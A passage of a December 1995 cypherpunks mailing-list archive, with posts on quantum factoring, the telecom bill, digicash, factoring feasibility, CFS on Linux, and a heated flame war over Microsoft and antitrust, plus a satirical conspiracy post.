Varney on Electronic Commerce and Privacy which is available at the FTC's
site under speeches (www.ftc.gov) or the Advertising Law Internet Site
(www.webcom.com/~lewrose/home.html) under speeches.

This week the staff of the FTC established a mailing list to allow
interested parties to discuss the issues surrounding the privacy interests
of consumers visiting web sites.  To subscribe, send the message "subscribe"
(without the quotes) to privacy-request@ftc.gov   I suspect most of the
participants will not represent the internet marketing community and urge
interested members of this list to subscribe and participate.  So far, there
have been only two posts-- one by me yesterday wondering why marketers on
the internet should be treated any differently than marketers using more
traditional media, followed by one post simply asserting that internet
marketing privacy issues are completely different from those raised by
traditional media.

Lew


Lewis Rose                           202-857-6012 (voice)
Arent Fox Kintner Plotkin & Kahn     202-857-6395 (fax)
1050 Connecticut Avenue, NW          lewrose@arentfox.com (email)
Washington DC  20036                 Advertising and Marketing Law
 Advertising Law Internet Site  http://www.webcom.com/~lewrose/home.html
 Net-Lawyers Mailing List:  net-lawyers@lawlib.wuacc.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Dec 95 19:33:08 PST
To: cypherpunks@toad.com
Subject: QCF_dec
Message-ID: <199512210332.WAA11993@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Science, 8 December 1995


   Quantum Computers, Factoring, and Decoherence

   I. L. Chuang, R. Laflamme, P. W. Shor, W. H. Zurek

   [First paragraph] The uniqueness of the prime
   factorization of a positive integer is the Fundamental
   Theorem of Arithmetic. In practice, the determination of
   the prime factors of a given number can be an exceedingly
   difficult problem, even though verification is trivial.
   This asymmetry is the basis for modern cryptography and
   provides secret codes used not only on your own bank card
   but also to transfer diplomatic messages between embassies.


   [Precis] It is known that quantum computers can
   dramatically speed up the task of finding factors of large
   numbers, a problem of practical significance for
   cryptographic applications. Factors of an L-digit number
   can be found in ~L^2 time [compared to ~exp(L^1/3) time] by
   a quantum computer, which simultaneously follows all paths
   corresponding to distinct classical inputs, obtaining the
   solution from the coherent quantum interference of the
   alternatives. Here it is shown how the decoherence process
   degrades the interference pattern that emerges from the
   quantum factoring algorithm. For a quantum computer
   performing logical operations, an exponential decay of
   quantum coherence is inevitable. However, even in the
   presence of exponential decoherence, quantum computation
   can be useful as long as a sufficiently low decoherence
   rate can be achieved to allow meaningful results to be
   extracted from the calculation.

   I. L. Chuang, Stanford University.

   R. Laflamme and W. H. Zurek, Los Alamos National Laboratory.

   P. W. Shor, AT&T Bell Labs.

   ----------

   QCF_dec (18 kb)

   Sent with compressed qcf1.jpg of 14 equations and 2 
   figures (31 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 20 Dec 95 19:37:24 PST
To: cypherpunks@toad.com
Subject: Re: Surprise telecommunications bill?
In-Reply-To: <2.2b7.32.19951221020731.008be6d4@mail.teleport.com>
Message-ID: <skqBN4_00YUv0FwmVM@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 20-Dec-95 Surprise
telecommunications.. by Alan Olsen@teleport.com 
> While watching the national news (NBC, I think) they mentioned that there
> had been a "surprising agreement on a telecommunications bill".  From the
> sparse description, it sounded pretty nasty. 
>  
> Does anyone have any additional information on this?

Yes, and it's not good. This telecom bill is going to be law real, real soon.

-Declan


---

  DOW JONES NEWS 12-20-95   
  6:29 PM

  WASHINGTON -AP- Negotiators resolved a dispute over media ownership,
removing the last major hurdle to an overhaul of laws governing the nation's
communications industry.   

  Once approved by Congress, the White House pledged to sign the legislation
into law.   

  ''This is an extremely positive development for the U.S. economy, for
individuals and for consumers alike,'' Vice President Al Gore said during
an interview in his office.   

  President Clinton, who had threatened to veto earlier provisions of
the measure, will sign what Gore called ''a centrist bill for the 21st
century.''   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Dec 95 23:13:26 PST
To: John Young <cypherpunks@toad.com
Subject: QCF_dec
Message-ID: <199512210713.XAA09335@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 20 Dec 95 22:56:02 PST
To: cypherpunks@toad.com
Subject: Digicash and capital adequacy
Message-ID: <Pine.SOL.3.91.951220224506.2806B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



This came out of a corridor discussion yesterday as to how digicash 
would affect future banking systems:

How does digicash interact with capital adequacy requirements? Should each
digi-dollar issued require a corresponding hunk'o'assets in the customers 
account, or should the bank be able to issue digicash using existing 
rules? Digicash can have a much faster velocity than real cash, so I can 
sort of imagine their being periods where adequacy limits could be exceeded.

What's the panels view?

Simon
 p.s.
    I got to see the movie "Hackers" while I was sick in bed after WWW 
    IV. The movie was pretty bogus, but the soundtrack was pretty 
    cool. The wonderful movie website had nothing about any soundtrack 
    albums; anyone know if there was one?
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Wed, 20 Dec 95 21:21:54 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org>
Message-ID: <951220.231202.6s3.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hey, "Bill Gates"...

I agree completely that the both you and Dr. Frederic B. Cohen are of
equal value in your contributions to the cypherpunks list.

alpha.c2.org offers 'nym accounts for free.  PLEASE get and use one, so
I can put you in my killfile, next to Dr. Frederic B. Cohen.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
           "I used to be disgusted, but now I'm just amused."
            -- from an old T-shirt(ca. 1975), not an Elvis Costello lyric

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNjtZhvikii9febJAQEDMQP/fTurXMuhXRaNZYRicFOwMebofxkWgYqc
DSa1HlzovcEJLlsxcpZ8J35VrW/q/pdPJhrl0if/kdA1euO4+H/riG44tuwRT70e
kZ7jRMxj3bRRT5HyVhaRsiDmN4COOORfuD9sTzqiGNNrTAS7CVZC2UOU6wSWBIrG
cCoER8/HBEw=
=TVG/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Dec 95 21:54:35 PST
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfe321c01021004d5c5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Anitro wrote:

>O.K. Just a factor of 16 increase over the CM architecture right? Not knowing
>the computational capabilities of the individual processors, it might be
>difficult to say what the machine is capable of. Wouldn't that have some
>bearing?

Not in cracking "truly large" problems by brute force. Even if each of the
million processors is capable of 100 MIPS (which is unlikely, given the PIM
approach and the fine-granularity, few-bit-or-less word size, etc.), this
is only 10^8 MIPS. For problems that (for instance) 10^75 machines would
have to spend 10^10 years on, not even a drop in an ocean.

The point is that no existing machines are going to make a dent in these
calculations, though algorithmic cleverness _might_ make factoring much
easier (personally, I doubt it).


>> Second, there was work on a "processor-in-memory" architecture, in
>> conjunction with a Bowie, Maryland spook-connected company. Perhaps this is
>> what you are thinking of?
>
>I didn't mention a 'processor-in-memory' architecture and neither did the NYT
>article. Don't know about any other company involvement, just CCC and NSA.

I wrote my response before seeing the other response someone else (Thaddeus
J. Beier) gave the name of the company. Thad's details match what I recall
about this Bowie company. The archives should have articles on this, dating
back about a year or so ago. As I recall, someone on the list knew people
working at the Supercomputer Research outfit.


>> Third, all avenues of continued funding having fallen through, Cray
>> Computer (not Cray Research, of course) was shut down and assets
>> liquidated. I haven't heard what's become of Seymour, though. (He is
>> undoubtedly an asset, buy I doubt the Agency would have him liquidated.)
>
>You mean the avenues that are of PUBLIC record. The possibility could always
>exist that the development continues 'in-house'. It wouldn't be the first time
>that sort of move has been played.

You, whoever you are, asked about the operational status of Cray Computer,
and I answered. It entered Chapter Seven liquidation, parts of existing
computers were sold for scrap or museum/curio objects, the GaAs fab was
sold to another company, and the employees scattered. Claiming the NSA
moved it "in-house" is implausible, at least in terms of these events.

>> Huh? First, what evidence do you have for this claim? Second, who cares?
>> Implementing Clipper in a Cray Computer machine--why bother?
>
>[Rant mode on]
>Speculation Tim... I'm SPECULATING. Could, in theory... AND my kind of theory
>probably has holes you could drive a FLEET of Mack trucks through. I have NO
>evidence. I'm not sure WHO would care. I'M A PARANOID DILLUSIONAL PSYCHOPATH!
>O.K. well maybe not that last part... but I'm asking the questions, remember?
>I said I'm new here, so if your going to blow holes in my pet theories, then
>do me the 'kindness' of using an accurate weapon... that's why I posted...

I asked what evidence you have for this claim. Idle speculation, based on
innumerate estimates of plausibility are helpful to no one.

>> As to the claim that a million-processor machine could do this, you need to
>> work out the math. (If a backdoor exists, or the LEAF has been gotten, a
>> supercomputer is not needed....)
>
>Again... I claimed NOTHING! SPECULATED MUCH! Now it's your turn... Why would
>YOU build a machine like this? What could POSSIBLY be it's capabilities?
>Speculate with me for a moment... *_take a chance_*.

On our list, and in the circles I am familiar with, "speculations" are not
treated with more respect than are actual "claims" (whatever they are). If
you speculate that "really, really fast computers" will make today's
ciphers insecure, based on not even the simplest of calculations, expect to
be either ignored or called to task. This is the way science works, by
falsification of theories (and speculations).

>> If you mean using supercomputers to brute force the general factoring of an
>> RSA modulus, this is nonsense. While there may be math shortcuts we don't
>> yet publically know about which make factoring easier than we currently
>> think it is, a mere million or even a billion processors will not make a
>> dent in the factoring of, say, a 700-digit modulus. See the tables in
>> Schneier and elsewhere for some estimates of factoring efforts needed.
>
>Nonsense? Is that 700 decimal digits or 700 binary digits? I don't have the
>tables that you refer to. Where may I find them? (LOL)

A 2048-bit key, such as many of us use, uses a roughly 700-decimal-digit
modulus. "Schneier," mentioned in my paragraph, is "Applied Cryptography."
Page 284 of the 1st Ed. has a discussion of the work involved in factoring
large moduli. Rivest has made some more detailed estimates.

Given your rudeness and self-professed ignorance of even the basic math, I
see no point in wasting any more of my time on your posts.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Wed, 20 Dec 95 23:24:01 PST
To: cypherpunks@toad.com
Subject: the problem with attacks on Blaze & Weinstein
Message-ID: <199512210723.XAA25191@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain



The "Blaze & Weinstein are devils in disguise" business is ridiculous, as is
the notion of "cypherpunk purity". Cypherpunks is a mailing list. If Blaze
and Weinstein were up to something especially tricky, they'd probably post
from accounts not traceable to their employers (like, say, anonymous
remailers). Suggesting that a person is not to be trusted because they work
for organization "X" is particularly silly where the suggestor isn't willing
to provide the details of their own organizational ties.

This is a mailing list. Mailing lists are for discussing things - like
technological defenses for privacy. People may have interesting things to
contribute because of, in spite of, or irrespective of their employment or
other relationships with large organizations. (And, in fact, they do. Both
Matt Blaze and Jeff Weinstein have done and said pro-privacy things despite
the equivocal-to-hostile stance their employers have taken with respect to
privacy. Brian Davis, the list's token prosecutor :), has recently been
sending messages re the limits of governmental power in the context of
criminal investigations. Microsoft employees have posted re Microsoft's
choices about privacy and encryption/security. And so on.) If this were a
secret organization and we were splitting up into individual cells for
revolutionary/forbidden activity, your suspicion/paranoia might be useful.
But we're not (it's an open list, archived on full-text searchable Web
servers), so it's not.

And, apart from whether or not they're valuable list contributors, the list
really isn't in a position to not "tolerate" unwanted or unproductive
readers or authors. The tools which make identity difficult to fix make it
difficult to restrict/deny access to an unpopular or unwanted identity. Get
used to it. Adapt or die, hmm? 

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 20 Dec 95 20:34:57 PST
To: Alex de Joode <usura@berserk.com>
Subject: Re: CFS and Linux
In-Reply-To: <199512201915.UAA00215@asylum.berserk.com>
Message-ID: <199512210440.XAA28196@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Is there anyone out there that has CFS running with Linux ?
> 
> It installs fine on BSDi 2.0 but I'm unable to install it 
> under Linux, I would appreciate it if some one would help
> me out.
> 
>  -AJ-

I don't run Linux, and every time I open my mouth it seems to provoke
a flame-fest, but I'll risk responding anyway.

I'm told that all version of CFS since 1.0.4 (the latest is 1.3.1)
do work out-of-the-box under *some* releases of Linux and with some
coaxing on the others.

I'm not sure exactly what problem you're having, but the most common
CFS-Linux problem that people complain about has to do with the rpcgen
output not being in the format expected by the rest of CFS.  There
seem to be two things you can do about this:  get a version of rpcgen
that generates the "standard" (original Sun) names for the functions it
generates, or just grab the rpcgen output from the cfs-users mailing list
archive ("echo help | mail cfs-users-request@research att.com" for details).

Or are you able to compile it but not get it installed?  I've not heard
of any problems here.  If so, you might try the cfs-users@research.att.com
mailing list and see if someone there can help out.

-matt

NB to "Bill Gates" and friends:  To save you the trouble of pointing it out,
I hereby admit that I'm a commie-fascist brainwashed sold out member of the
military-industrial complex who has been programmed by his masters to
infiltrate the cypherpunks in order to sap and impurify their precious
bodily fluids.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 20 Dec 95 23:57:23 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <9512210757.AA25763@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From the Fool on the Hill(aka ECafe):

ATT and Netscape are both tools of the CIA/NSA.
Blaze and Weinstein are in on the plot to force 
GAK upon us....
..Only true visionaries like myself and Dr. 
Frederic B Cohen are telling it like it is; 
everyone else has had the wool pulled over their 
eyes by the NSA/ATT/Netscape axis.
...................................................

Surely you're joking, Mr. Feynman!
Cpunks, do you not "get it" -

This has to be a jest, poking at some of the attitudes which have been 
expressed on the list.  I think it's a bit late, though, as most of the 
excitement has calmed, and this must be why it's not recognizable.  (if you 
think it's worth a comment, at least make it *funny*!, right.)

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 20 Dec 95 23:57:34 PST
To: attila <attila@primenet.com>
Subject: Re: on web standards: sent to Markoff
Message-ID: <9512210757.AA25767@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


Attila:

I'm surprised at you. I thought you were anarcho-capitalist. Oh, well; I have a 
few pithy comments in reply to your post (but anything beyond this will be in 
private email).

I'm tempted to say back to you, as you just recently stated: "if you have not 
walked in the other's shoes, keep silent."  Have you read any of the books on 
Microsoft or Bill Gates?  I think this would provide you with additional 
perspective on your conclusions about him and the company.

But think about this:

.  no company which MS has done business with has been coerced into dealing 
with the company and its products.  Those who felt compelled to do business on 
Billg's terms were influenced by their desire to reap the lucrative benefits of 
it. 
  
.  no customer has been coerced into purchasing the products offered;  they 
were not prevented from shopping for computers from companies which do not 
pre-install the OS; if it was already installed on the machines they purchased, 
they were free to delete it, they were not coerced into using it or into 
upgrading to the next release.

.  not only have many software companies not take advantage of the 
opportunities created for cashing in on the unexpected popularity of MS 
software, 
.  there have been occasions where competitors failed to see opportunities in 
the market which Microsoft did and took aim for, or
.  attempted business deals/associations among competitor software companies 
did not come about, thus failing to create a concerted competitive threat to 
Microsoft, or 
.  a dominant software product from a competitor suffered in the market place, 
(sometimes from the fault of "bad management"), thus again giving the advantage 
to Microsoft.

Often it has been what the competition *didn't do*, which gave Microsoft the 
advantage in the "market place", rather than any amazing magical business savvy 
or "unethical business practices".  

Nevertheless, as someone at MS said, "it isn't the customers who are 
complaining". There have been many willing participants, apparently, who have 
cooperated (or "conspired", if you will) in making the company the success 
which it has become.  And continue to do so.

  ..
Blanc

p.s.  Nuri-logical:  I like your idea for a "dog-eat-dog" welfare fund.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 21 Dec 95 00:22:40 PST
To: attila <attila@primenet.com>
Subject: attila's fallacious flagwaving
In-Reply-To: <Pine.BSD.3.91.951221035112.27593J-100000@usr1.primenet.com>
Message-ID: <199512210819.AAA01149@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>1)	you obviously have no concept of anti-trust or anti-competitive 
>	law, practice or the public interest it represents. I wrote my
>	thesis on government regulation of monopoly v. monopoly 
>        franchises such as utilities.

neither do you, mr. pseudonym. <g>  notice how nothing that MS does even
remotely resembles the *utility* business, and how painfully absurd it would
be to imply such a thing were so...

your point above, while seemingly implying something significant,
in itself gives absolutely no evidence for what you claim (i.e. that I don't
have a clue). this is quite similar to your essay in which you say that
"MS *clearly* violates free/fair trade" with nothing to support your
case other than innuendo. I am not going to play ----sizewars with you,
I wouldn't want to damage your obviously fragile selfesteem.  I wouldn't
*want* to be an expert on the ridiculous legislative laws that go under
the idea of "antitrust", which are just a convenient excuse in most cases
for the government to interfere with business when the public is whining
a lot.

>    2)  market domination can, and generally does, stifle competition, 
>	but it also kills innovation of alternatives.  Software companies
>	are too busy kissing arse with Bill, and threatened by Bill, 
>	to release software on other systems say unix or os/2. 

this is a subjective matter. you continually lace your claims with many
subjective claims that have no basis in fact. who is to decide what is
unfair and what is not? answer: a court. so far, no court has agreed with
you that MS has been involved in unfair trade. 

you seem to believe that you are the authority.
you have failed utterly to give a single concrete instance of how Microsoft
is *unfairly* stifling competition, although you have infinite innuendos
and seem to think that merely by saying things like "OS2" in your writing
that you have proved your case.

 it may be that Microsoft "stifles" 
competition because all of its competitors are simply *choosing* not to
compete with them on certain platforms and areas. now, 
*no*amount*of*legislation* will change what a company decides of their own
free will in this manner.

why is it a horrible calamity if other companies voluntarily *choose* not to
compete with microsoft? is microsoft putting a gun to anyone's head not
to compete with them? are they essentially paying people not to compete
with them? are they trying to sabotage their competitors by contract
killings on their programmers? no, they are succeeding because they 
have a *superior product*, *nothing* more sinister than that is going on.
no amount of wet-tissue-paper conspiracy theories ranting about API
documentation is going to change that.

>	a perfect example is Corel.  Corel was _very_ enthusiastic to 
>	release for OS/2, in fact they were ported to OS/2 before W95
>	released.  Shortly after the announcement, the honcho reversed
>	positions and canceled Rev 6 for OS/2 stating that Rev 2.5 which
>	has existed for some time, was "adequate" for OS/2. I am not going
>	to expose my inside source, as their will be retribution.

why is this a problem? companies change their course all the time based on
the competition. you think this is the first time a company decided to 
change course when they found out what a powerful competitor was doing?
*wrong*. obviously. but because MS is involved, you seem to think this
is a horrible injustice for mankind. there's no doubt that people voluntarily
choose not to compete with MS. MS voluntarily decided not to compete with
Intel for chip fabrication!! *surprise*.. likewise many software companies
choose not to compete with MS in particular areas that MS has *won* through
hard work.

MS is in the position of a marathon runner, not a tyrannical
despot as you imply. the *moment* that MS makes a bad strategic decision
or trips from their relentless pursuit of customer satisfaction, any one
of the numerous hyenas nipping at their hyenas will take advantage of the
slip.

>    3)  you are totally ignoring the comments on anti-thrust and restraint
>	of trade. In general market terms, anti-thrust is less important
>	than restraint of trade --Bill _clearly_ violates the rules on
>	restraint of trade, and therefore should be dismembered to avoid
>	lack of innovation as in #2 above. 

no amount of times of saying "Bill clearly violates [x]" will prove your case
without concrete examples, none of which you have provided. furthermore,
you are correct in that I am ignoring many of your comments about "markets".
you don't seem to understand this point: MS dominates in markets that they
*created*.

MS *created* the "widget" market. then to have other companies and individuals
such as yourself screech that they are being "excluded" from this market is
the height of hypocrisy, when these people voluntarily decided to "opt out"
at an early stage. this basic point of mine in my prior essay totally
sailed over your head.

 antitrust laws make sense in *pre*existing* 
markets that have come to be dominated by a single company, a "monopoly",
that seems to be trying to stifle competition. e.g. there are 5 railroad
companies, then suddenly there is only 1 that charges highway robbery. or, 
series of [x] barons collude to price fix.

what has MS done that
stifles competition? they stifle competition not by trying to overtly
prevent companies from competing. they "stifle competition" by being the
best there is. and you are free to change this by creating better software.
so far they are so ingenious in creating brilliant software that no one
has come close to their prowess.

why do you think that antitrust laws are the panacea for all problems in
markets? you haven't even proven that MS is a problem, you just take that
as a given. then you presume that because antitrust laws exist, they must
be sacred and they must apply. well, you look pretty silly to me trying to
apply your 19th century antitrust laws and feebleminded market ideas to
a state-of-the-art 20th century market that is doing just fine, thank you
very much, without interference from legislative busybodies like YOU.

do you recall the RAM "crisis" of a few years ago in which the Reagan 
administration accused Japan of "dumping" RAM chips? do you consider this
a success of legislation applied to high tech markets? if so you are
in the minority of all people in the technology industry.

now, dear sir, I admit that there are unethical businessmen, and I do
believe that government antitrust laws make sense when a single businessman
or a set of them are conspiring to seize a market and *prevent*competitors*
from even participating in that market. but nothing MS has done prevents
competitors a-prior. it is a far different thing to have some kind of
skullduggery that prevents others from even attempting to get into business
(such as blackmail, sabotage, manipulating their employees, manipulating
resources, etc.). however we have a clearcut situation in which various 
companies are simply voluntarily *choosing" not to compete with microsoft.

and you complain there is not enough "innovation" in the technological field?
you think MS' dominance is preventing "innovation"? this is the most utter
ridiculousness I've heard in many years, and I'm embarrassed to see these
thoughts on the CP list, although not surprised they come from someone
without any interest in revealing their identity.

> 4)	you clearly have no concept of American free market policy. Yes, 
>	you may be very successful, even filthy rich, but when you 
>	stretch your rights to clearly offend the public interest, then 
>	anti-trust and restraint of trade laws serve the _needs_ of a 
>	free and _competitive/innovative_ market.  

these things you talk about with breathless patriotism are all *subjective*.
its *subjective* whether a given company is preventing competition or
free trade. there may be legislative criteria, but they are only subjective
guidelines that the courts have to try to figure out. you talk about 
operating systems as if it is a "public interest" area. well, sir, it seems
to me you can manipulate any company to any ends you like by insisting that
what they manufacture, after all, is in the "public interest" and therefore
this merits legislative brainless busybodiness. 

furthermore your silly effusive rhetoric above again fails utterly to 
tangibly demonstrate that MS is engaged in "unfair" practices. again you
seem to believe that MS is involved in unfair practices because

1. Gates is the richest man on the planet
2. other companies avoid competing with MS in some areas
3. OS2 is not as successful as windows
4. gosh darn it, there isn't enough *innovation* in software right now

>	America does not serve dinner to merchants who rape, pillage, and 
>	burn --as Bill Gates has crushed his opponents; the barbarians 
>	are punished.  There are grounds for criminal charges in Bill's 
>	actions.

all I can say is, hee, hee.  Bill Gates is ruthless, I grant you that:
he's ruthless in cutting the crap out of his products and the hot air
that customers *don't* want, and putting in the concrete meat that people
crave, and the marketplace has virtually deified him. to argue with 
MS's dominance is to argue against the people who buy his products.
why do you think they made the wrong choices? with their own cash?
your legislative solution are designed to make decisions that individuals
are quite happy to make by themselves, thank you very much.

>    5)	you are incorrect in your assumptions that Gates was sued 
>	anonymously. 

I didn't say that. I said that his throat-slashing attackers would
*like* to be anonymous, as you delightfully prove.

>In the initial action by the DOJ, competitors were 
>	_asked_, by subpoena, for factual information by the DOJ.  The
>	_DOJ_ provided the shield in so much as Bill's barbarian actions
>	were of sufficient interest that evidence providers desired and
>	were given protection --not much different than the Federal
>	Witness Protection program. 

oh brother. yes, Bill is going to go out and hire hit men to get back
at all his enemies. (hee, hee, once again).

what you fail to understand is that if Bill decides that other companies
are trying to slash his own company's wrists, he has full authority to 
make business decisions regarding their declared enmity.

apparently your miracle system would be the following: any company can
lodge an anonymous complaint against their enemy and tie that enemy up
in court without revealing their own identity. after all, we need to
*protect* those accusers, don't we??

heh. in all your sparkling effusion about America (oh, I can hear the
flag flapping in the breeze behind you, god, this country is great)
you fail to consider the ideas about "confronting ones accuser" deemed
important enough to stick in the bill of rights...

can you reiterate why you think Bill is a "barbarian"?? hee, hee.

>	when CI$ and the rest banded together to protest Bill's obvious 
>	restraint of trade and stonewalling on hooks to Win95 for three 
>        months after Win95 released, they did not, and _could_ not, do 
>        so anonymously.

yes, what a pity they could not. let me tell you, I really feel your
pain. hahahahaha.

>    6)	how much is Bill paying _you_ for your efforts?  You obviously have
>	too much of an interest in the commercial outcome to be so ignorant.

my efforts in what? I have no financial ties to microsoft. I have friends
that work there. I have met plenty of people such as you who I think simply
fail to understand the concept of free enterprise, which does *not* promote
equality. in fact it rewards those people fantastically who can anticipate
markets and give consumers precisely what they want. and for this brilliant
gift of Gates' which is perhaps unparalleled in the history of business
(imho), you would like to cut up his painfully constructed kingdom so that
other people have a "chance" to "compete" in markets that Microsoft actually
originally created.
        
>    7) 	Your beliefs are one thing --state 'em, but don't speak for America
>	until you know the definition of the "public interest" and have 
>	some concept of anti-trust and restraint-of-trade legislation and
>	court rulings which have set the guidelines.  clutch it in,
>	_after_ your brain is in gear. 

your using terms such as "anti-trust" and "restraint of trade" do not make
you any authority either. I freely admit I am not an expert, but I also think 
that its translucently obvious to even some of the most uneducated of people
that

1. if there are laws, they can be misapplied by bureacrats to manipulate
companies. a situation where companies can sabotage each other merely through
litigation is a very serious red flag.

2. because a company is not doing well in the marketplace, is not reason
to introduce legislation or litigation against a successful company.
it is a reason to REJOICE that the market has sent a CLEAR MESSAGE
about WHAT IT DOESN'T WANT. any amount of whining and pleading by executives
in this company or their sniveling sycophants does not change this *basic*
reality.

IBM got a massive reality check in the marketplace in the early 80's. no 
matter how much they though they were sacred, the *market* told them 
to **** off!!! because they didn't have a clue, and failed to listen to 
people who were *offering* them clues for free (Bill Gates) included.
and you whine that IBM "didn't sabotage themself", that "they weren't
their own worst enemy", they just didn't "adjust". oh, the grisly horror.
they had half a decade or more to get a clue about what the industry wanted,
and it didn't tolerate their egocentric vaporideology. cypherpunks, rejoice.

3. furthermore, because a lot of people hate a company and think that they
ought to be restrained, DOES NOT MAKE THIS LEGITIMATE or ACTIONABLE. 
people are notorious for wanting things they don't really want in the 
long run, not understanding the full consequences of their own demands. 
that is, perhaps even demanding something that is self-contradictory
(i.e. "kill microsoft so that we can get more software innovation", apparently
your own view).

4. antitrust laws were invented in the 19th century and originally were
related to railroad price gouging. there was some real skullduggery going
on in this period imho, but to compare Gates to these "robber barons" is
a disservice to humanity and a black mark on your karma record, imho <g>


what is my hidden agenda? to see the truth as it stands, when everyone around
is trying to see the truth that fits their hidden agenda. its a rare gift
and a curse I assure you but it's known as "speaking one's truth". as someone
who has written software and understands the difficulty of *pleasing*customers*,
I congratulate Gates as a brilliant pioneer and visionary of the 20th century
and say a pox on all his detracters that paint him as a "barbarian" for his
sterling accomplishments in *customer*service* in an insanely difficult 
enterprise (software development).

I wouldn't have responded to your last message if you had more coherently
rebutted the actual message of my original essay. as it stands I just thought
I would sent this little missive to further highlight your own cluelessness
and decrease your reputation on the list. having done this, I think now
I will probably just ignore you as inconsequential or take fun intermittent
potshots  at you.

sweet dreams!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Wed, 20 Dec 95 17:10:00 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <199512210112.BAA05503@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm not trying to start a flame war, just telling
people what's REALLY happening.

ATT and Netscape are both tools of the CIA/NSA.
Blaze and Weinstein are in on the
plot to force GAK upon us.  Neither one
says enough about the evils of GAK on their
web page, so they're obviously for GAK and
only pretending to be against it to fool
the cypherpunks and curry favor with their NSA
masters.

Evidently the cypherpunks are all too impressed
with Blaze and Weinstein's master degrees to see
what's really happening.  Only true visionaries
like myself and Dr. Frederic B Cohen are telling
it like it is; everyone else has had the wool
pulled over their eyes by the NSA/ATT/Netscape axis.

It's amazing how clear everything becomes once
one stops taking the medication that THEY prescribed.

s/ Bill Gates





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 17:45:29 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <Pine.OSF.3.91.951220133424.7053C-100000@abernathy.tenet.edu>
Message-ID: <Pine.BSD.3.91.951221013748.27593C-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Harmon:

   Have you forgotten polite society?  Have you forgotten what your 
mother (should have) told you? "If you can not say something nice, don't 
say it."  --in particular refrain from personal attacks.  It is one thing 
to criticize, but it is another to blather unintelligibly without any 
knowledge than your own bias --and maybe your own intellectual ignorance 
and bigotry.  if you have not walked in the other's shoes, keep silent.

   now, if you will please excuse us, Perry has code to write --and I 
have code to write.  

   lastly, if you can not onserve reasonable decorum, sign for 
alt.christian and post heretical ravings, and if you are desparate for 
attention or your name in lights, join alt.flame and have at it.

    ATTILA

On Wed, 20 Dec 1995, Dan Harmon wrote:

> 
> Perry,
> 
> the only crypto code you seem to do is the unintelligble postings
> that you send to the list.
> 
> .d
> 
> On Wed, 20 Dec 1995, Perry E. Metzger wrote:
> 
> > 
> > Dan Harmon writes:
> > > If this is what you consider contributing them you seem to have some
> > > deep problems that cannot be solved here. You may have to seek professional 
> > > help. Your continued and at times seemingly uncontrollable use of vulgar 
> > > language may indicate a neurobiological disorder such as Tourette's 
